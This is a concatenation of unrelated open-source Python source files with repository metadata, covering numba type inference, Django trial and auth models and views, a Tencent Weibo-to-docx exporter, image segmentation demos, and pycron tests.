ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, LINE_ITEM_ID_1, LINE_ITEM_ID_2)
|
apache-2.0
| -8,936,408,167,704,282,000
| 36.192308
| 78
| 0.718201
| false
| 3.561694
| false
| false
| false
|
CMLL/Flask-Fixtures
|
setup.py
|
1
|
1677
|
"""
Flask-Fixtures
--------------
A fixtures library for testing Flask apps.
"""
import os
import subprocess
from setuptools import setup
root_dir = os.path.abspath(os.path.dirname(__file__))
package_dir = os.path.join(root_dir, 'flask_fixtures')
# Try to get the long description from the README file or the module's
# docstring if the README isn't available.
try:
README = open(os.path.join(root_dir, 'README.rst')).read()
except:
README = __doc__
setup(
name='Flask-Fixtures',
version='0.3.4',
url='https://github.com/croach/Flask-Fixtures',
license='MIT License',
author='Christopher Roach',
author_email='vthakr@gmail.com',
maintainer='Christopher Roach',
maintainer_email='vthakr@gmail.com',
description='A simple library for adding database fixtures for unit tests using nothing but JSON or YAML.',
long_description=README,
# py_modules=['flask_fixtures'],
# if you would be using a package instead use packages instead
# of py_modules:
packages=['flask_fixtures'],
zip_safe=False,
include_package_data=True,
platforms='any',
install_requires=[
'Flask',
'Flask-SQLAlchemy'
],
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Testing'
]
)
|
mit
| -2,382,888,362,794,428,000
| 28.421053
| 111
| 0.648778
| false
| 3.955189
| false
| false
| false
|
sklam/numba
|
numba/core/typing/typeof.py
|
1
|
6676
|
from collections import namedtuple
from functools import singledispatch
import ctypes
import enum
import numpy as np
from numba.core import types, utils, errors
from numba.np import numpy_support
# terminal color markup
_termcolor = errors.termcolor()
class Purpose(enum.Enum):
# Value being typed is used as an argument
argument = 1
# Value being typed is used as a constant
constant = 2
_TypeofContext = namedtuple("_TypeofContext", ("purpose",))
def typeof(val, purpose=Purpose.argument):
"""
Get the Numba type of a Python value for the given purpose.
"""
# Note the behaviour for Purpose.argument must match _typeof.c.
c = _TypeofContext(purpose)
ty = typeof_impl(val, c)
if ty is None:
msg = _termcolor.errmsg(
"cannot determine Numba type of %r") % (type(val),)
raise ValueError(msg)
return ty
@singledispatch
def typeof_impl(val, c):
"""
Generic typeof() implementation.
"""
tp = _typeof_buffer(val, c)
if tp is not None:
return tp
# cffi is handled here as it does not expose a public base class
# for exported functions or CompiledFFI instances.
from numba.core.typing import cffi_utils
if cffi_utils.SUPPORTED:
if cffi_utils.is_cffi_func(val):
return cffi_utils.make_function_type(val)
if cffi_utils.is_ffi_instance(val):
return types.ffi
return getattr(val, "_numba_type_", None)
def _typeof_buffer(val, c):
from numba.core.typing import bufproto
try:
m = memoryview(val)
except TypeError:
return
# Object has the buffer protocol
try:
dtype = bufproto.decode_pep3118_format(m.format, m.itemsize)
except ValueError:
return
type_class = bufproto.get_type_class(type(val))
layout = bufproto.infer_layout(m)
return type_class(dtype, m.ndim, layout=layout,
readonly=m.readonly)
@typeof_impl.register(ctypes._CFuncPtr)
def typeof_ctypes_function(val, c):
from .ctypes_utils import is_ctypes_funcptr, make_function_type
if is_ctypes_funcptr(val):
return make_function_type(val)
@typeof_impl.register(type)
def typeof_type(val, c):
"""
Type various specific Python types.
"""
if issubclass(val, BaseException):
return types.ExceptionClass(val)
if issubclass(val, tuple) and hasattr(val, "_asdict"):
return types.NamedTupleClass(val)
if issubclass(val, np.generic):
return types.NumberClass(numpy_support.from_dtype(val))
from numba.typed import Dict
if issubclass(val, Dict):
return types.TypeRef(types.DictType)
from numba.typed import List
if issubclass(val, List):
return types.TypeRef(types.ListType)
@typeof_impl.register(bool)
def _typeof_bool(val, c):
return types.boolean
@typeof_impl.register(float)
def _typeof_bool(val, c):
return types.float64
@typeof_impl.register(complex)
def _typeof_bool(val, c):
return types.complex128
def _typeof_int(val, c):
# As in _typeof.c
nbits = utils.bit_length(val)
if nbits < 32:
typ = types.intp
elif nbits < 64:
typ = types.int64
elif nbits == 64 and val >= 0:
typ = types.uint64
else:
raise ValueError("Int value is too large: %s" % val)
return typ
for cls in utils.INT_TYPES:
typeof_impl.register(cls, _typeof_int)
@typeof_impl.register(np.generic)
def _typeof_numpy_scalar(val, c):
try:
return numpy_support.map_arrayscalar_type(val)
except NotImplementedError:
pass
@typeof_impl.register(str)
def _typeof_str(val, c):
return types.string
@typeof_impl.register(type((lambda a: a).__code__))
def _typeof_code(val, c):
return types.code_type
@typeof_impl.register(type(None))
def _typeof_none(val, c):
return types.none
@typeof_impl.register(type(Ellipsis))
def _typeof_ellipsis(val, c):
return types.ellipsis
@typeof_impl.register(tuple)
def _typeof_tuple(val, c):
tys = [typeof_impl(v, c) for v in val]
if any(ty is None for ty in tys):
return
return types.BaseTuple.from_types(tys, type(val))
@typeof_impl.register(list)
def _typeof_list(val, c):
if len(val) == 0:
raise ValueError("Cannot type empty list")
ty = typeof_impl(val[0], c)
if ty is None:
raise ValueError(
"Cannot type list element of {!r}".format(type(val[0])),
)
return types.List(ty, reflected=True)
@typeof_impl.register(set)
def _typeof_set(val, c):
if len(val) == 0:
raise ValueError("Cannot type empty set")
item = next(iter(val))
ty = typeof_impl(item, c)
return types.Set(ty, reflected=True)
@typeof_impl.register(slice)
def _typeof_slice(val, c):
return types.slice2_type if val.step in (None, 1) else types.slice3_type
@typeof_impl.register(enum.Enum)
@typeof_impl.register(enum.IntEnum)
def _typeof_enum(val, c):
clsty = typeof_impl(type(val), c)
return clsty.member_type
@typeof_impl.register(enum.EnumMeta)
def _typeof_enum_class(val, c):
cls = val
members = list(cls.__members__.values())
if len(members) == 0:
raise ValueError("Cannot type enum with no members")
dtypes = {typeof_impl(mem.value, c) for mem in members}
if len(dtypes) > 1:
raise ValueError("Cannot type heterogeneous enum: "
"got value types %s"
% ", ".join(sorted(str(ty) for ty in dtypes)))
if issubclass(val, enum.IntEnum):
typecls = types.IntEnumClass
else:
typecls = types.EnumClass
return typecls(cls, dtypes.pop())
@typeof_impl.register(np.dtype)
def _typeof_dtype(val, c):
tp = numpy_support.from_dtype(val)
return types.DType(tp)
@typeof_impl.register(np.ndarray)
def _typeof_ndarray(val, c):
try:
dtype = numpy_support.from_dtype(val.dtype)
except NotImplementedError:
raise ValueError("Unsupported array dtype: %s" % (val.dtype,))
layout = numpy_support.map_layout(val)
readonly = not val.flags.writeable
return types.Array(dtype, val.ndim, layout, readonly=readonly)
@typeof_impl.register(types.NumberClass)
def typeof_number_class(val, c):
return val
@typeof_impl.register(types.Literal)
def typeof_literal(val, c):
return val
@typeof_impl.register(types.TypeRef)
def typeof_typeref(val, c):
return val
@typeof_impl.register(types.Type)
def typeof_typeref(val, c):
if isinstance(val, types.BaseFunction):
return val
elif isinstance(val, (types.Number, types.Boolean)):
return types.NumberClass(val)
else:
return types.TypeRef(val)
|
bsd-2-clause
| 5,694,277,277,401,790,000
| 26.02834
| 76
| 0.658778
| false
| 3.400917
| false
| false
| false
|
xingnix/learning
|
imageprocessing/python/10/segment.py
|
1
|
1154
|
import matplotlib.pyplot as plt
import numpy as np
import cv2
from skimage import io,color,data,filters,exposure,util,transform
#plt.switch_backend('qt5agg')
def otsu():
im=data.coins()
f=np.zeros(255)
minf=0
mini=0
for i in range(100,200):
c1=im[im<=i]
c2=im[im>i]
m1=np.mean(c1)
m2=np.mean(c2)
std1=np.std(c1)
std2=np.std(c2)
std3=np.std([m1,m2])
f[i]=std3/(1+std1*std2)
if f[i] > minf :
minf=std3
mini=i
io.imsave('coins.png',im)
io.imsave('coins-otsu.png',np.uint8(im>mini)*255)
def line_detect():
im=data.text()
seg=im<100
r=transform.radon(seg)
rho,theta=np.unravel_index(np.argmax(r),r.shape)
rho=rho-r.shape[0]/2
x=np.int(rho*np.cos((theta+90)*np.pi/180)+im.shape[0]/2)
y=np.int(rho*np.sin((theta+90)*np.pi/180)+im.shape[1]/2)
dx=np.cos((theta)*np.pi/180)
dy=np.sin((theta)*np.pi/180)
l=1000
res=im.copy()
cv2.line(res,(np.int(y-dy*l),np.int(x-dx*l)),(np.int(y+dy*l),np.int(x+dx*l)),255,2)
io.imsave('text.png',im)
io.imsave('text-line.png',res)
|
gpl-3.0
| 4,045,463,473,780,565,500
| 23.0625
| 87
| 0.571057
| false
| 2.364754
| false
| false
| false
|
AstroMatt/esa-time-perception
|
backend/api_v2/models/trial.py
|
1
|
9704
|
import json
import statistics
from django.db import models
from django.db.models import DateTimeField
from django.db.models import CharField
from django.db.models import FloatField
from django.db.models import EmailField
from django.db.models import BooleanField
from django.db.models import PositiveSmallIntegerField
from django.db.models import TextField
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from backend.api_v2.models import Click
from backend.api_v2.models import Event
from backend.api_v2.models import Survey
class Trial(models.Model):
TIME_MORNING = 'morning'
TIME_EVENING = 'evening'
TIME_OTHER = 'other'
TIME_CHOICES = [
(TIME_MORNING, _('Morning')),
(TIME_EVENING, _('Evening')),
(TIME_OTHER, _('Other')),
]
http_request_sha1 = CharField(verbose_name=_('SHA1'), max_length=40, db_index=True, unique=True, null=True, blank=True, default=None)
start_datetime = DateTimeField(verbose_name=_('Start datetime'), db_index=True)
end_datetime = DateTimeField(verbose_name=_('End datetime'))
colors = CharField(verbose_name=_('Color order'), max_length=50)
device = CharField(verbose_name=_('Device'), max_length=50)
location = CharField(verbose_name=_('Location'), max_length=50)
time = CharField(verbose_name=_('Time'), max_length=30, choices=TIME_CHOICES, null=True, blank=True, default=None)
uid = EmailField(verbose_name=_('User ID'), db_index=True)
polarization = CharField(verbose_name=_('Polarization'), max_length=50, null=True, blank=True, default=None)
timeout = FloatField(verbose_name=_('Timeout'), help_text=_('Seconds per color'))
regularity = PositiveSmallIntegerField(verbose_name=_('Regularity'), help_text=_('Click every X seconds'))
attempt = PositiveSmallIntegerField(verbose_name=_('Attempt'), null=True, blank=True, default=True)
is_valid = BooleanField(verbose_name=_('Valid?'), default=None, blank=True, null=True, db_index=True)
time_between_clicks = TextField(verbose_name=_('Time between clicks'), blank=True, null=True, default=None)
count_all = PositiveSmallIntegerField(verbose_name=_('Count'), null=True, blank=True)
count_blue = PositiveSmallIntegerField(verbose_name=_('Count - blue'), null=True, blank=True)
count_red = PositiveSmallIntegerField(verbose_name=_('Count - red'), null=True, blank=True)
count_white = PositiveSmallIntegerField(verbose_name=_('Count - white'), null=True, blank=True)
tempo_all = FloatField(verbose_name=_('Tempo'), null=True, blank=True)
tempo_blue = FloatField(verbose_name=_('Tempo - blue'), null=True, blank=True)
tempo_red = FloatField(verbose_name=_('Tempo - red'), null=True, blank=True)
tempo_white = FloatField(verbose_name=_('Tempo - white'), null=True, blank=True)
regularity_all = FloatField(verbose_name=_('Regularity'), null=True, blank=True)
regularity_blue = FloatField(verbose_name=_('Regularity - blue'), null=True, blank=True)
regularity_red = FloatField(verbose_name=_('Regularity - red'), null=True, blank=True)
regularity_white = FloatField(verbose_name=_('Regularity - white'), null=True, blank=True)
interval_all = FloatField(verbose_name=_('Interval'), null=True, blank=True)
interval_blue = FloatField(verbose_name=_('Interval - blue'), null=True, blank=True)
interval_red = FloatField(verbose_name=_('Interval - red'), null=True, blank=True)
interval_white = FloatField(verbose_name=_('Interval - white'), null=True, blank=True)
def get_absolute_url(self):
return reverse('api-v2:report', args=[self.uid])
@property
def survey(self):
return Survey.objects.get(trial=self)
@staticmethod
def add(http_request_sha1, trial, surveys, clicks, events):
trial, _ = Trial.objects.get_or_create(http_request_sha1=http_request_sha1, defaults=trial)
if surveys:
Survey.objects.get_or_create(trial=trial, **Survey.clean(surveys))
for click in clicks:
Click.objects.get_or_create(trial=trial, **click)
for event in events:
Event.objects.get_or_create(trial=trial, **event)
trial.validate()
trial.calculate()
Click.objects.filter(trial=trial).delete()
Event.objects.filter(trial=trial).delete()
return trial
def __str__(self):
return f'[{self.start_datetime:%Y-%m-%d %H:%M}] ({self.location}, {self.device}) {self.uid}'
class Meta:
verbose_name = _('Trial')
verbose_name_plural = _('Trials')
def get_data(self):
data = self.__dict__.copy()
data.pop('_state')
return data
def save(self, *args, **kwargs):
self.uid = self.uid.lower()
return super().save(*args, **kwargs)
def validate(self):
self.validate_clicks('blue')
self.validate_clicks('red')
self.validate_clicks('white')
self.validate_trial()
def calculate(self):
self.calculate_count()
self.calculate_tempo()
self.calculate_regularity()
self.calculate_interval()
def validate_clicks(self, color, elements_to_drop=2):
clicks = Click.objects.filter(trial=self, color=color).order_by('datetime')
for invalid in clicks[:elements_to_drop]:
invalid.is_valid = False
invalid.save()
for valid in clicks[elements_to_drop:]:
valid.is_valid = True
valid.save()
def validate_trial(self, min=25, max=200):
if not self.tempo_all:
self.calculate()
if min <= self.tempo_all <= max:
self.is_valid = True
else:
self.is_valid = False
self.save()
def get_time_between_clicks(self):
"""
Obliczamy czasowy współczynnik regularności dla koloru
1. Dla każdego kliknięcia w kolorze od czasu następnego (n+1) kliknięcia odejmuj czas poprzedniego (n) - interwały czasu pomiędzy kliknięciami
2. >>> {"czerwony": [1.025, 0.987, 1.000, 1.01...], "biały": [1.025, 0.987, 1.000, 1.01...], "niebieski": [1.025, 0.987, 1.000, 1.01...], "wszystkie": [1.025, 0.987, 1.000, 1.01...]}
"""
clicks = Click.objects.filter(trial=self, is_valid=True).order_by('datetime')
def get_time_deltas(series):
for i in range(1, len(series)):
d1 = series[i - 1].datetime
d2 = series[i].datetime
yield (d2 - d1).total_seconds()
blue = list(get_time_deltas(clicks.filter(color='blue')))
red = list(get_time_deltas(clicks.filter(color='red')))
white = list(get_time_deltas(clicks.filter(color='white')))
time_regularity_series = {
'all': blue + red + white,
'blue': blue,
'red': red,
'white': white}
self.time_between_clicks = json.dumps(time_regularity_series)
self.save()
return time_regularity_series
def calculate_count(self):
clicks = Click.objects.filter(trial=self, is_valid=True)
self.count_all = clicks.all().count()
self.count_blue = clicks.filter(color='blue').count()
self.count_red = clicks.filter(color='red').count()
self.count_white = clicks.filter(color='white').count()
self.save()
def calculate_tempo(self, precision=2):
"""
Zliczam ilość wszystkich kliknięć na każdym z kolorów i sumuję je
1. Określam procentowy współczynnik regularności: (ilość czasu / co ile sekund miał klikać) - 100%; n kliknięć - x%
2. Wyliczenie procentowych współczynników regularności (z kroku powyżej) dla każdego z kolorów osobno
3. >>> {"biały": 100, "czerwony": 110, "niebieski": 90} // wartości są w procentach
"""
percent_coefficient = float(self.timeout) / float(self.regularity)
self.tempo_all = round(self.count_all / (percent_coefficient * 3) * 100, precision)
self.tempo_blue = round(self.count_blue / percent_coefficient * 100, precision)
self.tempo_red = round(self.count_red / percent_coefficient * 100, precision)
self.tempo_white = round(self.count_white / percent_coefficient * 100, precision)
self.save()
def calculate_regularity(self, precision=4):
"""
Wyliczamy odchylenie standardowe dla wszystkich razem (po appendowaniu list - 60 elem), oraz dla każdego koloru osobno (listy po 20 elementów)
1. podnosimy każdy element listy do kwadratu
2. sumujemy kwadraty
3. pierwiastkujemy sumę
4. dzielimy pierwiastek przez ilość elementów
"""
clicks = self.get_time_between_clicks()
def stdev(series):
try:
return round(statistics.stdev(series), precision)
except statistics.StatisticsError:
return None
self.regularity_all = stdev(clicks['all'])
self.regularity_blue = stdev(clicks['blue'])
self.regularity_red = stdev(clicks['red'])
self.regularity_white = stdev(clicks['white'])
self.save()
def calculate_interval(self, precision=4):
clicks = self.get_time_between_clicks()
def mean(series):
try:
mean = round(statistics.mean(series), precision)
return abs(mean)
except statistics.StatisticsError:
return None
self.interval_all = mean(clicks['all'])
self.interval_blue = mean(clicks['blue'])
self.interval_red = mean(clicks['red'])
self.interval_white = mean(clicks['white'])
self.save()
|
mit
| 3,254,712,368,374,055,000
| 40.991304
| 190
| 0.640609
| false
| 3.380469
| false
| false
| false
|
fatiherikli/komposto.org
|
auth/views.py
|
1
|
2165
|
import json
from django.contrib.auth import logout, login, authenticate
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.db.models import Q, Count
from django.views.generic import (
FormView, CreateView, RedirectView, DetailView, UpdateView
)
from auth.mixins import LoginRequiredMixin
from auth.forms import (RegistrationForm, AuthenticationForm,
ProfileUpdateForm)
from django.contrib.auth.models import User
class RegistrationView(CreateView):
form_class = RegistrationForm
template_name = "auth/register.html"
def form_valid(self, form):
response = super(RegistrationView, self).form_valid(form)
user = authenticate(username=form.cleaned_data["username"],
password=form.cleaned_data["password1"])
login(self.request, user)
return response
def get_success_url(self):
return reverse("home")
class LoginView(FormView):
form_class = AuthenticationForm
template_name = "auth/login.html"
def form_valid(self, form):
login(self.request, form.get_user())
return super(LoginView, self).form_valid(form)
def get_success_url(self):
return self.request.GET.get("next") or reverse("home")
def get_context_data(self, **kwargs):
context = super(LoginView, self).get_context_data(**kwargs)
context["next"] = self.request.GET.get("next", "")
return context
class LogoutView(LoginRequiredMixin, RedirectView):
def get(self, request, *args, **kwargs):
logout(request)
return super(LogoutView, self).get(request, *args, **kwargs)
def get_redirect_url(self, **kwargs):
return reverse("home")
class ProfileDetailView(DetailView):
slug_field = 'username'
slug_url_kwarg = 'username'
context_object_name = "profile"
model = User
class ProfileUpdateView(LoginRequiredMixin, UpdateView):
form_class = ProfileUpdateForm
def get_object(self, queryset=None):
return self.request.user
def get_success_url(self):
return '/'
|
mit
| 2,634,806,515,822,161,400
| 29.069444
| 68
| 0.684988
| false
| 4.024164
| false
| false
| false
|
coolcooldool/tencent-weibo-exporter
|
version15/tencent_util.py
|
1
|
12471
|
# -*- coding: utf-8 -*-
'''
Created on 2017/12/21
@author: yuyang
'''
import os
from urllib import request
import uuid
import re
import docx_ext
from docx.shared import Pt
from docx.shared import RGBColor
from docx.shared import Inches
JPEG_EXTENSION = '.jpg'
PNG_EXTENSION = '.png'
GIF_EXTENSION = '.gif'
SPLIT_STRING = '///'
TOPIC_STRING = 'TTOOPPIICC'
EMOJI_STRING = 'EEMMOOJJII'
FRIEND_STRING = 'FFRRIIEENNDD'
URL_STRING = 'UURRLL'
QQEMO_STRING = 'QQEEMMOO'
OTHEREMO_STRING = 'OOTTHHEERR'
def add_author(document, author):
para = document.add_paragraph()
run = para.add_run(author)
font = run.font
#font.name = 'Microsoft YaHei'
font.size = Pt(12)
font.color.rgb = RGBColor(0x43, 0x6E, 0xEE)
def add_content(document, content, para = None, font_size = 16):
if content.__contains__('k.t.qq.com'):
pattern = re.compile(r'(<a href="http://k.t.qq.com.*?</a>)', re.S)
topics = re.findall(pattern, content)
for topic in topics:
topic_word = topic.split('#')[1]
content = content.replace(topic, SPLIT_STRING + TOPIC_STRING + '#' + topic_word + '#' + SPLIT_STRING)
if content.__contains__('www/mb/images/emoji'):
pattern_emoji = re.compile(r'(<img.*?>)', re.S)
pattern_emoji_img = re.compile(r"crs='(.*?)'", re.S)
emojis = re.findall(pattern_emoji, content)
for emoji in emojis:
emoji_url = re.findall(pattern_emoji_img, emoji)[0]
filename = download_pic(emoji_url, PNG_EXTENSION)
content = content.replace(emoji, SPLIT_STRING + EMOJI_STRING + filename + SPLIT_STRING)
if content.__contains__('em rel="@'):
pattern_friend = re.compile(r'(<em rel=.*?</em>)', re.S)
pattern_friend_name = re.compile(r'<em.*?title="(.*?)"', re.S)
friends = re.findall(pattern_friend, content)
for friend in friends:
friend_name = re.findall(pattern_friend_name, friend)[0]
content = content.replace(friend, SPLIT_STRING + FRIEND_STRING + friend_name + SPLIT_STRING)
if content.__contains__('http://url.cn'):
pattern_url = re.compile(r'(<a href=.*?</a>)', re.S)
pattern_url_str = re.compile(r'<a href="(.*?)"', re.S)
urls = re.findall(pattern_url, content)
for url in urls:
url_str = re.findall(pattern_url_str, url)[0]
content = content.replace(url, SPLIT_STRING + URL_STRING + url_str + SPLIT_STRING)
if content.__contains__('www/mb/images/face'):
pattern_qqemo = re.compile(r'(<img.*?>)', re.S)
pattern_qqemo_img = re.compile(r"crs='(.*?)'", re.S)
qqemos = re.findall(pattern_qqemo, content)
for qqemo in qqemos:
qqemo_url = re.findall(pattern_qqemo_img, qqemo)[0]
filename = download_pic(qqemo_url, GIF_EXTENSION)
content = content.replace(qqemo, SPLIT_STRING + QQEMO_STRING + filename + SPLIT_STRING)
if content.__contains__('<img class='):
pattern_other_emo = re.compile(r'(<img.*?>)', re.S)
pattern_other_emo_img = re.compile(r'<img.*?crs=(.*?) title=', re.S)
pattern_other_emo_img_only = re.compile(r'<img.*?crs=(.*?)>', re.S)
#<img class='crs dn' crs='http://qzonestyle.gtimg.cn/qzone/em/e2043.gif'>
pattern_other_emos = re.findall(pattern_other_emo, content)
for other_emo in pattern_other_emos:
other_emo_match = re.findall(pattern_other_emo_img, other_emo)
if not other_emo_match:# some emoji have special pattern
other_emo_match = re.findall(pattern_other_emo_img_only, other_emo)
other_emo_url = other_emo_match[0]
other_emo_url = other_emo_url[1:-1]# delete start and end mark ' "
filename = download_pic(other_emo_url, other_emo_url[-4:])
content = content.replace(other_emo, SPLIT_STRING + OTHEREMO_STRING + filename + SPLIT_STRING)
content_parts = content.split(SPLIT_STRING)
if not para:
para = document.add_paragraph()
for content_part in content_parts:
# delete first <div> mark
if content_part.startswith('<div>'):
content_part = content_part[5:]
if content_part.startswith(TOPIC_STRING):
run = para.add_run(content_part.replace(TOPIC_STRING, ''))
font = run.font
font.italic = True
font.bold = False
font.size = Pt(font_size)
font.color.rgb = RGBColor(0x00, 0x00, 0xCD)
elif content_part.startswith(EMOJI_STRING):
run = para.add_run()
filename = content_part.replace(EMOJI_STRING, '')
run.add_picture(filename)
elif content_part.startswith(FRIEND_STRING):
run = para.add_run(content_part.replace(FRIEND_STRING, ''))
font = run.font
font.italic = True
font.bold = False
font.size = Pt(font_size - 2)
font.color.rgb = RGBColor(0xFF, 0x45, 0x00)
elif content_part.startswith(URL_STRING):
docx_ext.add_hyperlink(para, content_part.replace(URL_STRING, ''),
content_part.replace(URL_STRING, ''), '1E90FF', True)
elif content_part.startswith(QQEMO_STRING):
run = para.add_run()
filename = content_part.replace(QQEMO_STRING, '')
run.add_picture(filename)
elif content_part.startswith(OTHEREMO_STRING):
run = para.add_run()
filename = content_part.replace(OTHEREMO_STRING, '')
run.add_picture(filename)
else:
content_part = content_part.replace('&', '&')
content_part = content_part.replace('>', '>')
content_part = content_part.replace('"', '"')
content_part = content_part.replace('<', '<')
run = para.add_run(content_part)
font = run.font
font.bold = False
font.size = Pt(font_size)
font.color.rgb = RGBColor(0x08, 0x08, 0x08)
def add_quotation(document, quotation):
if not quotation:
return
quotation_items = analyze_quotation(quotation)
para = document.add_paragraph(style='IntenseQuote')
if len(quotation_items) == 1:
run = para.add_run(quotation_items[0])
font = run.font
font.bold = False
font.size = Pt(12)
font.color.rgb = RGBColor(0xA9, 0xA9, 0xA9)
return
run = para.add_run(quotation_items[0] + u':')
font = run.font
font.bold = False
font.size = Pt(12)
font.color.rgb = RGBColor(0x48, 0xD1, 0xCC)
add_content(document, quotation_items[1] + '\n', para, 12)
filenames = analyze_pic(quotation)
for filename in filenames:
try:
run_pic = para.add_run()
run_pic.add_picture(filename, width=Inches(3))
para.add_run('\n')
except:
print('转帖插入图片出错:' + filename)
run_time = para.add_run(quotation_items[2])
font_time = run_time.font
font_time.bold = False
font_time.size = Pt(8)
font_time.color.rgb = RGBColor(0x69, 0x69, 0x69)
def add_picture(document, story):
filenames = analyze_pic(story)
for filename in filenames:
try:
document.add_picture(filename, width=Inches(5))
except:
print('插入图片出错:' + filename)
def add_time(document, time):
para = document.add_paragraph()
run = para.add_run(time)
font = run.font
font.italic = True
#font.name = 'Microsoft YaHei'
font.size = Pt(10)
font.color.rgb = RGBColor(0x7A, 0x7A, 0x7A)
def add_location(document, story):
location_items = analyze_loc(story)
if len(location_items) <= 0:
return
link_name = location_items[2]
google_map_url = 'https://maps.google.com/maps?q=' + location_items[0] + ',' + location_items[1]
print(google_map_url)
para = document.add_paragraph()
run = para.add_run(u'位置:')
font = run.font
font.size = Pt(10)
font.color.rgb = RGBColor(0x7A, 0x7A, 0x7A)
docx_ext.add_hyperlink(para, google_map_url, link_name, '4169E1', False)
def add_video(document, story):
video_items = analyze_video(story)
if not video_items:
return
para = document.add_paragraph()
run = para.add_run()
font = run.font
font.size = Pt(10)
font.color.rgb = RGBColor(0x7A, 0x7A, 0x7A)
docx_ext.add_hyperlink(para, video_items[0], video_items[1], '4169E1', False)
try:
document.add_picture(video_items[3], width=Inches(3))
except:
print('视频封面插入出错:' + video_items[3])
def download_pic(url, extension):
try:
if not os.path.exists('.//pics'):
os.mkdir('.//pics')
filename = '.\\pics\\' + str(uuid.uuid4()) + extension
request.urlretrieve(url, filename)
except Exception:
print('下载图片出错:' + url)
return filename
def analyze_pic(story):
filenames = []
if story.__contains__('class="picBox"'):
pattern = re.compile(r'<div class="picBox">\n<a href="(.*?)" data-like', re.S)
img_url = re.findall(pattern, story)[0]
print('图片:', img_url)
filename = download_pic(img_url, JPEG_EXTENSION)
filenames.append(filename)
elif story.__contains__('class="tl_imgGroup'):
pattern = re.compile(r'<div class="tl_imgGroup(.*?)<div class="miniMultiMedia clear"', re.S)
imgs_str = re.findall(pattern, story)[0]
pattern_img = re.compile(r'<a href="(.*?)" class="tl_imgGroup', re.S)
imgs = re.findall(pattern_img, imgs_str)
for img_url in imgs:
print('图片:', img_url)
filename = download_pic(img_url, JPEG_EXTENSION)
filenames.append(filename)
return filenames
def analyze_loc(story):
location_items = []
if story.__contains__('class="areaInfo"'):
pattern = re.compile(r'boss="btn_check_tweetNear".*?lat=(.*?)&lng=(.*?)&addr=(.*?)" target', re.S)
location_items = re.findall(pattern, story)[0]
print(u'位置:' + location_items[2])
print(u'经度:' + location_items[0])
print(u'纬度:' + location_items[1])
return location_items
def analyze_video(story):
video_items = []
if story.__contains__('class="videoBox"'):
pattern = re.compile(r'<div class="videoBox".*?realurl="(.*?)".*?reltitle="(.*?)".*?<img.*?crs="(.*?)"', re.S)
video_items = re.findall(pattern, story)[0]
print(u'视频名称:' + video_items[1])
print(u'视频网址:' + video_items[0])
print(u'视频封面:' + video_items[2])
try:
filename = download_pic(video_items[2], '.jpg')
except:
print(u'下载视频封面出错:' + video_items[2])
filename = None
video_items = list(video_items)
video_items.append(filename)
return video_items
def depart_quotation(story):
quotation_block = None
if story.__contains__('class="replyBox"'):
if story.__contains__('class="noMSource"'):#原文已被作者删除的情况
pattern = re.compile(r'(<div class="replyBox".*?<div class="noMSource".*?</div>.*?</div>)', re.S)
quotation_block = re.findall(pattern, story)[0]
else:
pattern = re.compile(r'(<div class="replyBox".*?<div class="msgBox".*?title=".*?" gender=' +
'.*?<div class="pubInfo.*?from="\\d*">.*?</a>.*?</div>.*?</div>)', re.S)
quotation_block = re.findall(pattern, story)[0]
story = story.replace(quotation_block, '')
return story, quotation_block
def analyze_quotation(quotation):
quotation_items = []
if quotation.__contains__('class="noMSource"'):
quotation_items = [u'原文已经被作者删除。']
return quotation_items
pattern = re.compile(r'<div class="msgCnt".*?title="(.*?)" gender=' +
'.*?<div>(.*?)</div>' +
'.*?<div class="pubInfo.*?from="\\d*">(.*?)</a>', re.S)
quotation_items = re.findall(pattern, quotation)[0]
print('原帖作者:', quotation_items[0])
print('原帖内容:', quotation_items[1])
print('原帖时间:', quotation_items[2])
return quotation_items
|
apache-2.0
| -2,133,465,114,962,808,600
| 38.012739
| 118
| 0.580292
| false
| 3.196503
| false
| false
| false
|
morrillo/hr_loans
|
hr.py
|
1
|
1465
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class hr_loan(osv.osv):
_name = 'hr.loan'
_description = 'HR Loan'
_columns = {
'employee_id': fields.many2one('hr.employee','id','Employee ID'),
'loan_type': fields.selection((('P','Payment Advance'),
('L','Loan')),'Loan Type'),
'loan_date': fields.date('Loan Date'),
'comment': fields.text('Additional Information'),
}
hr_loan()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
| -1,966,382,299,273,435,600
| 37.552632
| 78
| 0.604778
| false
| 4.035813
| false
| false
| false
|
kipe/pycron
|
tests/test_minute.py
|
1
|
3235
|
from datetime import datetime
import pycron
from pytz import utc
import pendulum
import arrow
import udatetime
from delorean import Delorean
def test_minute():
def run(now):
assert pycron.is_now('* * * * *', now)
assert pycron.is_now('9 * * * *', now)
assert pycron.is_now('*/1 * * * *', now)
assert pycron.is_now('*/3 * * * *', now)
assert pycron.is_now('*/9 * * * *', now)
assert pycron.is_now('3,9,25,16 * * * *', now)
assert pycron.is_now('*/2 * * * *', now) is False
assert pycron.is_now('*/4 * * * *', now) is False
assert pycron.is_now('*/5 * * * *', now) is False
assert pycron.is_now('*/12 * * * *', now) is False
assert pycron.is_now('3,25,16 * * * *', now) is False
assert pycron.is_now('0-10 * * * *', now)
assert pycron.is_now('0-10 0-10 * * *', now)
assert pycron.is_now('10-20 * * * *', now) is False
assert pycron.is_now('10-20 10-20 * * *', now) is False
assert pycron.is_now('1,2,5-10 * * * *', now)
assert pycron.is_now('9,5-8 * * * *', now)
